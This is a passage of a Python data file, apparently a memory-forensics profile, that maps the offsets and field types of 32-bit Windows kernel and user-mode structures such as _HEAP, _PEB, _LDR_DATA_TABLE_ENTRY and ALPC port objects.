'WritesInProgress' : [ 0x154, ['unsigned long']],
} ],
'__unnamed_1866' : [ 0x8, {
'FileOffset' : [ 0x0, ['_LARGE_INTEGER']],
'ActiveCount' : [ 0x0, ['unsigned short']],
} ],
'_VACB' : [ 0x20, {
'BaseAddress' : [ 0x0, ['pointer', ['void']]],
'SharedCacheMap' : [ 0x4, ['pointer', ['_SHARED_CACHE_MAP']]],
'Overlay' : [ 0x8, ['__unnamed_1866']],
'Links' : [ 0x10, ['_LIST_ENTRY']],
'ArrayHead' : [ 0x18, ['pointer', ['_VACB_ARRAY_HEADER']]],
} ],
'_KGUARDED_MUTEX' : [ 0x20, {
'Count' : [ 0x0, ['long']],
'Owner' : [ 0x4, ['pointer', ['_KTHREAD']]],
'Contention' : [ 0x8, ['unsigned long']],
'Gate' : [ 0xc, ['_KGATE']],
'KernelApcDisable' : [ 0x1c, ['short']],
'SpecialApcDisable' : [ 0x1e, ['short']],
'CombinedApcDisable' : [ 0x1c, ['unsigned long']],
} ],
'__unnamed_1884' : [ 0x4, {
'FileObject' : [ 0x0, ['pointer', ['_FILE_OBJECT']]],
} ],
'__unnamed_1886' : [ 0x4, {
'SharedCacheMap' : [ 0x0, ['pointer', ['_SHARED_CACHE_MAP']]],
} ],
'__unnamed_1888' : [ 0x4, {
'Event' : [ 0x0, ['pointer', ['_KEVENT']]],
} ],
'__unnamed_188a' : [ 0x4, {
'Reason' : [ 0x0, ['unsigned long']],
} ],
'__unnamed_188c' : [ 0x4, {
'Read' : [ 0x0, ['__unnamed_1884']],
'Write' : [ 0x0, ['__unnamed_1886']],
'Event' : [ 0x0, ['__unnamed_1888']],
'Notification' : [ 0x0, ['__unnamed_188a']],
} ],
'_WORK_QUEUE_ENTRY' : [ 0x10, {
'WorkQueueLinks' : [ 0x0, ['_LIST_ENTRY']],
'Parameters' : [ 0x8, ['__unnamed_188c']],
'Function' : [ 0xc, ['unsigned char']],
} ],
'VACB_LEVEL_ALLOCATION_LIST' : [ 0x10, {
'VacbLevelList' : [ 0x0, ['_LIST_ENTRY']],
'VacbLevelWithBcbListHeads' : [ 0x8, ['pointer', ['void']]],
'VacbLevelsAllocated' : [ 0xc, ['unsigned long']],
} ],
'_VACB_LEVEL_REFERENCE' : [ 0x8, {
'Reference' : [ 0x0, ['long']],
'SpecialReference' : [ 0x4, ['long']],
} ],
'_CACHE_UNINITIALIZE_EVENT' : [ 0x14, {
'Next' : [ 0x0, ['pointer', ['_CACHE_UNINITIALIZE_EVENT']]],
'Event' : [ 0x4, ['_KEVENT']],
} ],
'_HEAP_LIST_LOOKUP' : [ 0x24, {
'ExtendedLookup' : [ 0x0, ['pointer', ['_HEAP_LIST_LOOKUP']]],
'ArraySize' : [ 0x4, ['unsigned long']],
'ExtraItem' : [ 0x8, ['unsigned long']],
'ItemCount' : [ 0xc, ['unsigned long']],
'OutOfRangeItems' : [ 0x10, ['unsigned long']],
'BaseIndex' : [ 0x14, ['unsigned long']],
'ListHead' : [ 0x18, ['pointer', ['_LIST_ENTRY']]],
'ListsInUseUlong' : [ 0x1c, ['pointer', ['unsigned long']]],
'ListHints' : [ 0x20, ['pointer', ['pointer', ['_LIST_ENTRY']]]],
} ],
'_HEAP' : [ 0x138, {
'Entry' : [ 0x0, ['_HEAP_ENTRY']],
'SegmentSignature' : [ 0x8, ['unsigned long']],
'SegmentFlags' : [ 0xc, ['unsigned long']],
'SegmentListEntry' : [ 0x10, ['_LIST_ENTRY']],
'Heap' : [ 0x18, ['pointer', ['_HEAP']]],
'BaseAddress' : [ 0x1c, ['pointer', ['void']]],
'NumberOfPages' : [ 0x20, ['unsigned long']],
'FirstEntry' : [ 0x24, ['pointer', ['_HEAP_ENTRY']]],
'LastValidEntry' : [ 0x28, ['pointer', ['_HEAP_ENTRY']]],
'NumberOfUnCommittedPages' : [ 0x2c, ['unsigned long']],
'NumberOfUnCommittedRanges' : [ 0x30, ['unsigned long']],
'SegmentAllocatorBackTraceIndex' : [ 0x34, ['unsigned short']],
'Reserved' : [ 0x36, ['unsigned short']],
'UCRSegmentList' : [ 0x38, ['_LIST_ENTRY']],
'Flags' : [ 0x40, ['unsigned long']],
'ForceFlags' : [ 0x44, ['unsigned long']],
'CompatibilityFlags' : [ 0x48, ['unsigned long']],
'EncodeFlagMask' : [ 0x4c, ['unsigned long']],
'Encoding' : [ 0x50, ['_HEAP_ENTRY']],
'PointerKey' : [ 0x58, ['unsigned long']],
'Interceptor' : [ 0x5c, ['unsigned long']],
'VirtualMemoryThreshold' : [ 0x60, ['unsigned long']],
'Signature' : [ 0x64, ['unsigned long']],
'SegmentReserve' : [ 0x68, ['unsigned long']],
'SegmentCommit' : [ 0x6c, ['unsigned long']],
'DeCommitFreeBlockThreshold' : [ 0x70, ['unsigned long']],
'DeCommitTotalFreeThreshold' : [ 0x74, ['unsigned long']],
'TotalFreeSize' : [ 0x78, ['unsigned long']],
'MaximumAllocationSize' : [ 0x7c, ['unsigned long']],
'ProcessHeapsListIndex' : [ 0x80, ['unsigned short']],
'HeaderValidateLength' : [ 0x82, ['unsigned short']],
'HeaderValidateCopy' : [ 0x84, ['pointer', ['void']]],
'NextAvailableTagIndex' : [ 0x88, ['unsigned short']],
'MaximumTagIndex' : [ 0x8a, ['unsigned short']],
'TagEntries' : [ 0x8c, ['pointer', ['_HEAP_TAG_ENTRY']]],
'UCRList' : [ 0x90, ['_LIST_ENTRY']],
'AlignRound' : [ 0x98, ['unsigned long']],
'AlignMask' : [ 0x9c, ['unsigned long']],
'VirtualAllocdBlocks' : [ 0xa0, ['_LIST_ENTRY']],
'SegmentList' : [ 0xa8, ['_LIST_ENTRY']],
'AllocatorBackTraceIndex' : [ 0xb0, ['unsigned short']],
'NonDedicatedListLength' : [ 0xb4, ['unsigned long']],
'BlocksIndex' : [ 0xb8, ['pointer', ['void']]],
'UCRIndex' : [ 0xbc, ['pointer', ['void']]],
'PseudoTagEntries' : [ 0xc0, ['pointer', ['_HEAP_PSEUDO_TAG_ENTRY']]],
'FreeLists' : [ 0xc4, ['_LIST_ENTRY']],
'LockVariable' : [ 0xcc, ['pointer', ['_HEAP_LOCK']]],
'CommitRoutine' : [ 0xd0, ['pointer', ['void']]],
'FrontEndHeap' : [ 0xd4, ['pointer', ['void']]],
'FrontHeapLockCount' : [ 0xd8, ['unsigned short']],
'FrontEndHeapType' : [ 0xda, ['unsigned char']],
'Counters' : [ 0xdc, ['_HEAP_COUNTERS']],
'TuningParameters' : [ 0x130, ['_HEAP_TUNING_PARAMETERS']],
} ],
'__unnamed_18dd' : [ 0x18, {
'CriticalSection' : [ 0x0, ['_RTL_CRITICAL_SECTION']],
} ],
'_HEAP_LOCK' : [ 0x18, {
'Lock' : [ 0x0, ['__unnamed_18dd']],
} ],
'_RTL_CRITICAL_SECTION' : [ 0x18, {
'DebugInfo' : [ 0x0, ['pointer', ['_RTL_CRITICAL_SECTION_DEBUG']]],
'LockCount' : [ 0x4, ['long']],
'RecursionCount' : [ 0x8, ['long']],
'OwningThread' : [ 0xc, ['pointer', ['void']]],
'LockSemaphore' : [ 0x10, ['pointer', ['void']]],
'SpinCount' : [ 0x14, ['unsigned long']],
} ],
'_HEAP_ENTRY' : [ 0x8, {
'Size' : [ 0x0, ['unsigned short']],
'Flags' : [ 0x2, ['unsigned char']],
'SmallTagIndex' : [ 0x3, ['unsigned char']],
'SubSegmentCode' : [ 0x0, ['pointer', ['void']]],
'PreviousSize' : [ 0x4, ['unsigned short']],
'SegmentOffset' : [ 0x6, ['unsigned char']],
'LFHFlags' : [ 0x6, ['unsigned char']],
'UnusedBytes' : [ 0x7, ['unsigned char']],
'FunctionIndex' : [ 0x0, ['unsigned short']],
'ContextValue' : [ 0x2, ['unsigned short']],
'InterceptorValue' : [ 0x0, ['unsigned long']],
'UnusedBytesLength' : [ 0x4, ['unsigned short']],
'EntryOffset' : [ 0x6, ['unsigned char']],
'ExtendedBlockSignature' : [ 0x7, ['unsigned char']],
'Code1' : [ 0x0, ['unsigned long']],
'Code2' : [ 0x4, ['unsigned short']],
'Code3' : [ 0x6, ['unsigned char']],
'Code4' : [ 0x7, ['unsigned char']],
'AgregateCode' : [ 0x0, ['unsigned long long']],
} ],
'_HEAP_SEGMENT' : [ 0x40, {
'Entry' : [ 0x0, ['_HEAP_ENTRY']],
'SegmentSignature' : [ 0x8, ['unsigned long']],
'SegmentFlags' : [ 0xc, ['unsigned long']],
'SegmentListEntry' : [ 0x10, ['_LIST_ENTRY']],
'Heap' : [ 0x18, ['pointer', ['_HEAP']]],
'BaseAddress' : [ 0x1c, ['pointer', ['void']]],
'NumberOfPages' : [ 0x20, ['unsigned long']],
'FirstEntry' : [ 0x24, ['pointer', ['_HEAP_ENTRY']]],
'LastValidEntry' : [ 0x28, ['pointer', ['_HEAP_ENTRY']]],
'NumberOfUnCommittedPages' : [ 0x2c, ['unsigned long']],
'NumberOfUnCommittedRanges' : [ 0x30, ['unsigned long']],
'SegmentAllocatorBackTraceIndex' : [ 0x34, ['unsigned short']],
'Reserved' : [ 0x36, ['unsigned short']],
'UCRSegmentList' : [ 0x38, ['_LIST_ENTRY']],
} ],
'_HEAP_FREE_ENTRY' : [ 0x10, {
'Size' : [ 0x0, ['unsigned short']],
'Flags' : [ 0x2, ['unsigned char']],
'SmallTagIndex' : [ 0x3, ['unsigned char']],
'SubSegmentCode' : [ 0x0, ['pointer', ['void']]],
'PreviousSize' : [ 0x4, ['unsigned short']],
'SegmentOffset' : [ 0x6, ['unsigned char']],
'LFHFlags' : [ 0x6, ['unsigned char']],
'UnusedBytes' : [ 0x7, ['unsigned char']],
'FunctionIndex' : [ 0x0, ['unsigned short']],
'ContextValue' : [ 0x2, ['unsigned short']],
'InterceptorValue' : [ 0x0, ['unsigned long']],
'UnusedBytesLength' : [ 0x4, ['unsigned short']],
'EntryOffset' : [ 0x6, ['unsigned char']],
'ExtendedBlockSignature' : [ 0x7, ['unsigned char']],
'Code1' : [ 0x0, ['unsigned long']],
'Code2' : [ 0x4, ['unsigned short']],
'Code3' : [ 0x6, ['unsigned char']],
'Code4' : [ 0x7, ['unsigned char']],
'AgregateCode' : [ 0x0, ['unsigned long long']],
'FreeList' : [ 0x8, ['_LIST_ENTRY']],
} ],
'_PEB' : [ 0x248, {
'InheritedAddressSpace' : [ 0x0, ['unsigned char']],
'ReadImageFileExecOptions' : [ 0x1, ['unsigned char']],
'BeingDebugged' : [ 0x2, ['unsigned char']],
'BitField' : [ 0x3, ['unsigned char']],
'ImageUsesLargePages' : [ 0x3, ['BitField', dict(start_bit = 0, end_bit = 1, native_type='unsigned char')]],
'IsProtectedProcess' : [ 0x3, ['BitField', dict(start_bit = 1, end_bit = 2, native_type='unsigned char')]],
'IsLegacyProcess' : [ 0x3, ['BitField', dict(start_bit = 2, end_bit = 3, native_type='unsigned char')]],
'IsImageDynamicallyRelocated' : [ 0x3, ['BitField', dict(start_bit = 3, end_bit = 4, native_type='unsigned char')]],
'SkipPatchingUser32Forwarders' : [ 0x3, ['BitField', dict(start_bit = 4, end_bit = 5, native_type='unsigned char')]],
'SpareBits' : [ 0x3, ['BitField', dict(start_bit = 5, end_bit = 8, native_type='unsigned char')]],
'Mutant' : [ 0x4, ['pointer', ['void']]],
'ImageBaseAddress' : [ 0x8, ['pointer', ['void']]],
'Ldr' : [ 0xc, ['pointer', ['_PEB_LDR_DATA']]],
'ProcessParameters' : [ 0x10, ['pointer', ['_RTL_USER_PROCESS_PARAMETERS']]],
'SubSystemData' : [ 0x14, ['pointer', ['void']]],
'ProcessHeap' : [ 0x18, ['pointer', ['void']]],
'FastPebLock' : [ 0x1c, ['pointer', ['_RTL_CRITICAL_SECTION']]],
'AtlThunkSListPtr' : [ 0x20, ['pointer', ['void']]],
'IFEOKey' : [ 0x24, ['pointer', ['void']]],
'CrossProcessFlags' : [ 0x28, ['unsigned long']],
'ProcessInJob' : [ 0x28, ['BitField', dict(start_bit = 0, end_bit = 1, native_type='unsigned long')]],
'ProcessInitializing' : [ 0x28, ['BitField', dict(start_bit = 1, end_bit = 2, native_type='unsigned long')]],
'ProcessUsingVEH' : [ 0x28, ['BitField', dict(start_bit = 2, end_bit = 3, native_type='unsigned long')]],
'ProcessUsingVCH' : [ 0x28, ['BitField', dict(start_bit = 3, end_bit = 4, native_type='unsigned long')]],
'ProcessUsingFTH' : [ 0x28, ['BitField', dict(start_bit = 4, end_bit = 5, native_type='unsigned long')]],
'ReservedBits0' : [ 0x28, ['BitField', dict(start_bit = 5, end_bit = 32, native_type='unsigned long')]],
'KernelCallbackTable' : [ 0x2c, ['pointer', ['void']]],
'UserSharedInfoPtr' : [ 0x2c, ['pointer', ['void']]],
'SystemReserved' : [ 0x30, ['array', 1, ['unsigned long']]],
'AtlThunkSListPtr32' : [ 0x34, ['unsigned long']],
'ApiSetMap' : [ 0x38, ['pointer', ['void']]],
'TlsExpansionCounter' : [ 0x3c, ['unsigned long']],
'TlsBitmap' : [ 0x40, ['pointer', ['void']]],
'TlsBitmapBits' : [ 0x44, ['array', 2, ['unsigned long']]],
'ReadOnlySharedMemoryBase' : [ 0x4c, ['pointer', ['void']]],
'HotpatchInformation' : [ 0x50, ['pointer', ['void']]],
'ReadOnlyStaticServerData' : [ 0x54, ['pointer', ['pointer', ['void']]]],
'AnsiCodePageData' : [ 0x58, ['pointer', ['void']]],
'OemCodePageData' : [ 0x5c, ['pointer', ['void']]],
'UnicodeCaseTableData' : [ 0x60, ['pointer', ['void']]],
'NumberOfProcessors' : [ 0x64, ['unsigned long']],
'NtGlobalFlag' : [ 0x68, ['unsigned long']],
'CriticalSectionTimeout' : [ 0x70, ['_LARGE_INTEGER']],
'HeapSegmentReserve' : [ 0x78, ['unsigned long']],
'HeapSegmentCommit' : [ 0x7c, ['unsigned long']],
'HeapDeCommitTotalFreeThreshold' : [ 0x80, ['unsigned long']],
'HeapDeCommitFreeBlockThreshold' : [ 0x84, ['unsigned long']],
'NumberOfHeaps' : [ 0x88, ['unsigned long']],
'MaximumNumberOfHeaps' : [ 0x8c, ['unsigned long']],
'ProcessHeaps' : [ 0x90, ['pointer', ['pointer', ['void']]]],
'GdiSharedHandleTable' : [ 0x94, ['pointer', ['void']]],
'ProcessStarterHelper' : [ 0x98, ['pointer', ['void']]],
'GdiDCAttributeList' : [ 0x9c, ['unsigned long']],
'LoaderLock' : [ 0xa0, ['pointer', ['_RTL_CRITICAL_SECTION']]],
'OSMajorVersion' : [ 0xa4, ['unsigned long']],
'OSMinorVersion' : [ 0xa8, ['unsigned long']],
'OSBuildNumber' : [ 0xac, ['unsigned short']],
'OSCSDVersion' : [ 0xae, ['unsigned short']],
'OSPlatformId' : [ 0xb0, ['unsigned long']],
'ImageSubsystem' : [ 0xb4, ['unsigned long']],
'ImageSubsystemMajorVersion' : [ 0xb8, ['unsigned long']],
'ImageSubsystemMinorVersion' : [ 0xbc, ['unsigned long']],
'ActiveProcessAffinityMask' : [ 0xc0, ['unsigned long']],
'GdiHandleBuffer' : [ 0xc4, ['array', 34, ['unsigned long']]],
'PostProcessInitRoutine' : [ 0x14c, ['pointer', ['void']]],
'TlsExpansionBitmap' : [ 0x150, ['pointer', ['void']]],
'TlsExpansionBitmapBits' : [ 0x154, ['array', 32, ['unsigned long']]],
'SessionId' : [ 0x1d4, ['unsigned long']],
'AppCompatFlags' : [ 0x1d8, ['_ULARGE_INTEGER']],
'AppCompatFlagsUser' : [ 0x1e0, ['_ULARGE_INTEGER']],
'pShimData' : [ 0x1e8, ['pointer', ['void']]],
'AppCompatInfo' : [ 0x1ec, ['pointer', ['void']]],
'CSDVersion' : [ 0x1f0, ['_UNICODE_STRING']],
'ActivationContextData' : [ 0x1f8, ['pointer', ['_ACTIVATION_CONTEXT_DATA']]],
'ProcessAssemblyStorageMap' : [ 0x1fc, ['pointer', ['_ASSEMBLY_STORAGE_MAP']]],
'SystemDefaultActivationContextData' : [ 0x200, ['pointer', ['_ACTIVATION_CONTEXT_DATA']]],
'SystemAssemblyStorageMap' : [ 0x204, ['pointer', ['_ASSEMBLY_STORAGE_MAP']]],
'MinimumStackCommit' : [ 0x208, ['unsigned long']],
'FlsCallback' : [ 0x20c, ['pointer', ['_FLS_CALLBACK_INFO']]],
'FlsListHead' : [ 0x210, ['_LIST_ENTRY']],
'FlsBitmap' : [ 0x218, ['pointer', ['void']]],
'FlsBitmapBits' : [ 0x21c, ['array', 4, ['unsigned long']]],
'FlsHighIndex' : [ 0x22c, ['unsigned long']],
'WerRegistrationData' : [ 0x230, ['pointer', ['void']]],
'WerShipAssertPtr' : [ 0x234, ['pointer', ['void']]],
'pContextData' : [ 0x238, ['pointer', ['void']]],
'pImageHeaderHash' : [ 0x23c, ['pointer', ['void']]],
'TracingFlags' : [ 0x240, ['unsigned long']],
'HeapTracingEnabled' : [ 0x240, ['BitField', dict(start_bit = 0, end_bit = 1, native_type='unsigned long')]],
'CritSecTracingEnabled' : [ 0x240, ['BitField', dict(start_bit = 1, end_bit = 2, native_type='unsigned long')]],
'SpareTracingBits' : [ 0x240, ['BitField', dict(start_bit = 2, end_bit = 32, native_type='unsigned long')]],
} ],
'_PEB_LDR_DATA' : [ 0x30, {
'Length' : [ 0x0, ['unsigned long']],
'Initialized' : [ 0x4, ['unsigned char']],
'SsHandle' : [ 0x8, ['pointer', ['void']]],
'InLoadOrderModuleList' : [ 0xc, ['_LIST_ENTRY']],
'InMemoryOrderModuleList' : [ 0x14, ['_LIST_ENTRY']],
'InInitializationOrderModuleList' : [ 0x1c, ['_LIST_ENTRY']],
'EntryInProgress' : [ 0x24, ['pointer', ['void']]],
'ShutdownInProgress' : [ 0x28, ['unsigned char']],
'ShutdownThreadId' : [ 0x2c, ['pointer', ['void']]],
} ],
'_LDR_DATA_TABLE_ENTRY' : [ 0x78, {
'InLoadOrderLinks' : [ 0x0, ['_LIST_ENTRY']],
'InMemoryOrderLinks' : [ 0x8, ['_LIST_ENTRY']],
'InInitializationOrderLinks' : [ 0x10, ['_LIST_ENTRY']],
'DllBase' : [ 0x18, ['pointer', ['void']]],
'EntryPoint' : [ 0x1c, ['pointer', ['void']]],
'SizeOfImage' : [ 0x20, ['unsigned long']],
'FullDllName' : [ 0x24, ['_UNICODE_STRING']],
'BaseDllName' : [ 0x2c, ['_UNICODE_STRING']],
'Flags' : [ 0x34, ['unsigned long']],
'LoadCount' : [ 0x38, ['unsigned short']],
'TlsIndex' : [ 0x3a, ['unsigned short']],
'HashLinks' : [ 0x3c, ['_LIST_ENTRY']],
'SectionPointer' : [ 0x3c, ['pointer', ['void']]],
'CheckSum' : [ 0x40, ['unsigned long']],
'TimeDateStamp' : [ 0x44, ['unsigned long']],
'LoadedImports' : [ 0x44, ['pointer', ['void']]],
'EntryPointActivationContext' : [ 0x48, ['pointer', ['_ACTIVATION_CONTEXT']]],
'PatchInformation' : [ 0x4c, ['pointer', ['void']]],
'ForwarderLinks' : [ 0x50, ['_LIST_ENTRY']],
'ServiceTagLinks' : [ 0x58, ['_LIST_ENTRY']],
'StaticLinks' : [ 0x60, ['_LIST_ENTRY']],
'ContextInformation' : [ 0x68, ['pointer', ['void']]],
'OriginalBase' : [ 0x6c, ['unsigned long']],
'LoadTime' : [ 0x70, ['_LARGE_INTEGER']],
} ],
'_HEAP_SUBSEGMENT' : [ 0x20, {
'LocalInfo' : [ 0x0, ['pointer', ['_HEAP_LOCAL_SEGMENT_INFO']]],
'UserBlocks' : [ 0x4, ['pointer', ['_HEAP_USERDATA_HEADER']]],
'AggregateExchg' : [ 0x8, ['_INTERLOCK_SEQ']],
'BlockSize' : [ 0x10, ['unsigned short']],
'Flags' : [ 0x12, ['unsigned short']],
'BlockCount' : [ 0x14, ['unsigned short']],
'SizeIndex' : [ 0x16, ['unsigned char']],
'AffinityIndex' : [ 0x17, ['unsigned char']],
'Alignment' : [ 0x10, ['array', 2, ['unsigned long']]],
'SFreeListEntry' : [ 0x18, ['_SINGLE_LIST_ENTRY']],
'Lock' : [ 0x1c, ['unsigned long']],
} ],
'__unnamed_195c' : [ 0x4, {
'DataLength' : [ 0x0, ['short']],
'TotalLength' : [ 0x2, ['short']],
} ],
'__unnamed_195e' : [ 0x4, {
's1' : [ 0x0, ['__unnamed_195c']],
'Length' : [ 0x0, ['unsigned long']],
} ],
'__unnamed_1960' : [ 0x4, {
'Type' : [ 0x0, ['short']],
'DataInfoOffset' : [ 0x2, ['short']],
} ],
'__unnamed_1962' : [ 0x4, {
's2' : [ 0x0, ['__unnamed_1960']],
'ZeroInit' : [ 0x0, ['unsigned long']],
} ],
'_PORT_MESSAGE' : [ 0x18, {
'u1' : [ 0x0, ['__unnamed_195e']],
'u2' : [ 0x4, ['__unnamed_1962']],
'ClientId' : [ 0x8, ['_CLIENT_ID']],
'DoNotUseThisField' : [ 0x8, ['double']],
'MessageId' : [ 0x10, ['unsigned long']],
'ClientViewSize' : [ 0x14, ['unsigned long']],
'CallbackId' : [ 0x14, ['unsigned long']],
} ],
'_ALPC_MESSAGE_ATTRIBUTES' : [ 0x8, {
'AllocatedAttributes' : [ 0x0, ['unsigned long']],
'ValidAttributes' : [ 0x4, ['unsigned long']],
} ],
'_ALPC_HANDLE_ENTRY' : [ 0x4, {
'Object' : [ 0x0, ['pointer', ['void']]],
} ],
'_BLOB_TYPE' : [ 0x24, {
'ResourceId' : [ 0x0, ['Enumeration', dict(target = 'long', choices = {0: 'BLOB_TYPE_UNKNOWN', 1: 'BLOB_TYPE_CONNECTION_INFO', 2: 'BLOB_TYPE_MESSAGE', 3: 'BLOB_TYPE_SECURITY_CONTEXT', 4: 'BLOB_TYPE_SECTION', 5: 'BLOB_TYPE_REGION', 6: 'BLOB_TYPE_VIEW', 7: 'BLOB_TYPE_RESERVE', 8: 'BLOB_TYPE_DIRECT_TRANSFER', 9: 'BLOB_TYPE_HANDLE_DATA', 10: 'BLOB_TYPE_MAX_ID'})]],
'PoolTag' : [ 0x4, ['unsigned long']],
'Flags' : [ 0x8, ['unsigned long']],
'CreatedObjects' : [ 0xc, ['unsigned long']],
'DeletedObjects' : [ 0x10, ['unsigned long']],
'DeleteProcedure' : [ 0x14, ['pointer', ['void']]],
'DestroyProcedure' : [ 0x18, ['pointer', ['void']]],
'UsualSize' : [ 0x1c, ['unsigned long']],
'LookasideIndex' : [ 0x20, ['unsigned long']],
} ],
'__unnamed_197e' : [ 0x1, {
'ReferenceCache' : [ 0x0, ['BitField', dict(start_bit = 0, end_bit = 1, native_type='unsigned char')]],
'Lookaside' : [ 0x0, ['BitField', dict(start_bit = 1, end_bit = 2, native_type='unsigned char')]],
'Initializing' : [ 0x0, ['BitField', dict(start_bit = 2, end_bit = 3, native_type='unsigned char')]],
'Deleted' : [ 0x0, ['BitField', dict(start_bit = 3, end_bit = 4, native_type='unsigned char')]],
} ],
'__unnamed_1980' : [ 0x1, {
's1' : [ 0x0, ['__unnamed_197e']],
'Flags' : [ 0x0, ['unsigned char']],
} ],
'_BLOB' : [ 0x18, {
'ResourceList' : [ 0x0, ['_LIST_ENTRY']],
'FreeListEntry' : [ 0x0, ['_SINGLE_LIST_ENTRY']],
'u1' : [ 0x8, ['__unnamed_1980']],
'ResourceId' : [ 0x9, ['unsigned char']],
'CachedReferences' : [ 0xa, ['short']],
'ReferenceCount' : [ 0xc, ['long']],
'Lock' : [ 0x10, ['_EX_PUSH_LOCK']],
'Pad' : [ 0x14, ['unsigned long']],
} ],
'__unnamed_1992' : [ 0x4, {
'Internal' : [ 0x0, ['BitField', dict(start_bit = 0, end_bit = 1, native_type='unsigned long')]],
'Secure' : [ 0x0, ['BitField', dict(start_bit = 1, end_bit = 2, native_type='unsigned long')]],
} ],
'__unnamed_1994' : [ 0x4, {
's1' : [ 0x0, ['__unnamed_1992']],
} ],
'_KALPC_SECTION' : [ 0x28, {
'SectionObject' : [ 0x0, ['pointer', ['void']]],
'Size' : [ 0x4, ['unsigned long']],
'HandleTable' : [ 0x8, ['pointer', ['_ALPC_HANDLE_TABLE']]],
'SectionHandle' : [ 0xc, ['pointer', ['void']]],
'OwnerProcess' : [ 0x10, ['pointer', ['_EPROCESS']]],
'OwnerPort' : [ 0x14, ['pointer', ['_ALPC_PORT']]],
'u1' : [ 0x18, ['__unnamed_1994']],
'NumberOfRegions' : [ 0x1c, ['unsigned long']],
'RegionListHead' : [ 0x20, ['_LIST_ENTRY']],
} ],
'__unnamed_199a' : [ 0x4, {
'Secure' : [ 0x0, ['BitField', dict(start_bit = 0, end_bit = 1, native_type='unsigned long')]],
} ],
'__unnamed_199c' : [ 0x4, {
's1' : [ 0x0, ['__unnamed_199a']],
} ],
'_KALPC_REGION' : [ 0x30, {
'RegionListEntry' : [ 0x0, ['_LIST_ENTRY']],
'Section' : [ 0x8, ['pointer', ['_KALPC_SECTION']]],
'Offset' : [ 0xc, ['unsigned long']],
'Size' : [ 0x10, ['unsigned long']],
'ViewSize' : [ 0x14, ['unsigned long']],
'u1' : [ 0x18, ['__unnamed_199c']],
'NumberOfViews' : [ 0x1c, ['unsigned long']],
'ViewListHead' : [ 0x20, ['_LIST_ENTRY']],
'ReadOnlyView' : [ 0x28, ['pointer', ['_KALPC_VIEW']]],
'ReadWriteView' : [ 0x2c, ['pointer', ['_KALPC_VIEW']]],
} ],
'__unnamed_19a2' : [ 0x4, {
'WriteAccess' : [ 0x0, ['BitField', dict(start_bit = 0, end_bit = 1, native_type='unsigned long')]],
'AutoRelease' : [ 0x0, ['BitField', dict(start_bit = 1, end_bit = 2, native_type='unsigned long')]],
'ForceUnlink' : [ 0x0, ['BitField', dict(start_bit = 2, end_bit = 3, native_type='unsigned long')]],
} ],
'__unnamed_19a4' : [ 0x4, {
's1' : [ 0x0, ['__unnamed_19a2']],
} ],
'_KALPC_VIEW' : [ 0x34, {
'ViewListEntry' : [ 0x0, ['_LIST_ENTRY']],
'Region' : [ 0x8, ['pointer', ['_KALPC_REGION']]],
'OwnerPort' : [ 0xc, ['pointer', ['_ALPC_PORT']]],
'OwnerProcess' : [ 0x10, ['pointer', ['_EPROCESS']]],
'Address' : [ 0x14, ['pointer', ['void']]],
'Size' : [ 0x18, ['unsigned long']],
'SecureViewHandle' : [ 0x1c, ['pointer', ['void']]],
'WriteAccessHandle' : [ 0x20, ['pointer', ['void']]],
'u1' : [ 0x24, ['__unnamed_19a4']],
'NumberOfOwnerMessages' : [ 0x28, ['unsigned long']],
'ProcessViewListEntry' : [ 0x2c, ['_LIST_ENTRY']],
} ],
'_ALPC_COMMUNICATION_INFO' : [ 0x24, {
'ConnectionPort' : [ 0x0, ['pointer', ['_ALPC_PORT']]],
'ServerCommunicationPort' : [ 0x4, ['pointer', ['_ALPC_PORT']]],
'ClientCommunicationPort' : [ 0x8, ['pointer', ['_ALPC_PORT']]],
'CommunicationList' : [ 0xc, ['_LIST_ENTRY']],
'HandleTable' : [ 0x14, ['_ALPC_HANDLE_TABLE']],
} ],
'__unnamed_19c0' : [ 0x4, {
'Initialized' : [ 0x0, ['BitField', dict(start_bit = 0, end_bit = 1, native_type='unsigned long')]],
'Type' : [ 0x0, ['BitField', dict(start_bit = 1, end_bit = 3, native_type='unsigned long')]],
'ConnectionPending' : [ 0x0, ['BitField', dict(start_bit = 3, end_bit = 4, native_type='unsigned long')]],
'ConnectionRefused' : [ 0x0, ['BitField', dict(start_bit = 4, end_bit = 5, native_type='unsigned long')]],
'Disconnected' : [ 0x0, ['BitField', dict(start_bit = 5, end_bit = 6, native_type='unsigned long')]],
'Closed' : [ 0x0, ['BitField', dict(start_bit = 6, end_bit = 7, native_type='unsigned long')]],
'NoFlushOnClose' : [ 0x0, ['BitField', dict(start_bit = 7, end_bit = 8, native_type='unsigned long')]],
'ReturnExtendedInfo' : [ 0x0, ['BitField', dict(start_bit = 8, end_bit = 9, native_type='unsigned long')]],
'Waitable' : [ 0x0, ['BitField', dict(start_bit = 9, end_bit = 10, native_type='unsigned long')]],
'DynamicSecurity' : [ 0x0, ['BitField', dict(start_bit = 10, end_bit = 11, native_type='unsigned long')]],
'Wow64CompletionList' : [ 0x0, ['BitField', dict(start_bit = 11, end_bit = 12, native_type='unsigned long')]],
'Lpc' : [ 0x0, ['BitField', dict(start_bit = 12, end_bit = 13, native_type='unsigned long')]],
'LpcToLpc' : [ 0x0, ['BitField', dict(start_bit = 13, end_bit = 14, native_type='unsigned long')]],
'HasCompletionList' : [ 0x0, ['BitField', dict(start_bit = 14, end_bit = 15, native_type='unsigned long')]],
'HadCompletionList' : [ 0x0, ['BitField', dict(start_bit = 15, end_bit = 16, native_type='unsigned long')]],
'EnableCompletionList' : [ 0x0, ['BitField', dict(start_bit = 16, end_bit = 17, native_type='unsigned long')]],
} ],
'__unnamed_19c2' : [ 0x4, {
's1' : [ 0x0, ['__unnamed_19c0']],
'State' : [ 0x0, ['unsigned long']],
} ],
'_ALPC_PORT' : [ 0xfc, {
'PortListEntry' : [ 0x0, ['_LIST_ENTRY']],
'CommunicationInfo' : [ 0x8, ['pointer', ['_ALPC_COMMUNICATION_INFO']]],
'OwnerProcess' : [ 0xc, ['pointer', ['_EPROCESS']]],
'CompletionPort' : [ 0x10, ['pointer', ['void']]],
'CompletionKey' : [ 0x14, ['pointer', ['void']]],
'CompletionPacketLookaside' : [ 0x18, ['pointer', ['_ALPC_COMPLETION_PACKET_LOOKASIDE']]],
'PortContext' : [ 0x1c, ['pointer', ['void']]],
'StaticSecurity' : [ 0x20, ['_SECURITY_CLIENT_CONTEXT']],
'MainQueue' : [ 0x5c, ['_LIST_ENTRY']],
'PendingQueue' : [ 0x64, ['_LIST_ENTRY']],
'LargeMessageQueue' : [ 0x6c, ['_LIST_ENTRY']],
'WaitQueue' : [ 0x74, ['_LIST_ENTRY']],
